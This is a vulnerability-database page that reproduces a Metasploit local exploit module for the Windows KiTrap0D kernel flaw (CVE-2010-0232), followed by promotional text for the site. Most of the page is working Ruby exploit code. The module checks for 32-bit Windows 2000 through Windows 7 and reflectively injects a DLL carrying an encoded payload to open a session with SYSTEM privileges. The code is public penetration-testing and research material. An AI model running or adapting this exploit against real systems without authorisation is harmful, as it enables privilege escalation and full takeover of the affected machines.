Lucene search
K

Windows SYSTEM Escalation via KiTrap0D

🗓️ 11 Nov 2013 07:14:40Reported by Tavis Ormandy, HD Moore, Pusscat, OJ ReevesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 172 Views

Windows SYSTEM Escalation via KiTrap0D. Create new session with SYSTEM privileges using KiTrap0D exploit. Not supported on x64 Windows editions

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows SYSTEM Escalation via KiTrap0D',
        'Description' => %q{
          This module will create a new session with SYSTEM privileges via the
          KiTrap0D exploit by Tavis Ormandy. If the session in use is already
          elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
          and is not supported on x64 editions of Windows.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Tavis Ormandy', # Original resesarcher and exploit creator
          'HD Moore',      # Port of Tavis' code to meterpreter module
          'Pusscat',       # Port of Tavis' code to meterpreter module
          'OJ Reeves'      # Port of meterpreter code to a windows local exploit
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          [ 'CVE', '2010-0232' ],
          [ 'OSVDB', '61854' ],
          [ 'MSB', 'MS10-015' ],
          [ 'EDB', '11199' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ]
        ],
        'DisclosureDate' => '2010-01-19'
      )
    )
  end

  def check
    # Validate platform architecture
    if sysinfo['Architecture'] == ARCH_X64
      return Exploit::CheckCode::Safe
    end

    # Validate OS version
    version = get_version_info
    unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP1)
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    print_status('Reflectively injecting payload and triggering the bug...')
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-0232', 'kitrap0d.x86.dll'),
      encoded_payload
    )

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation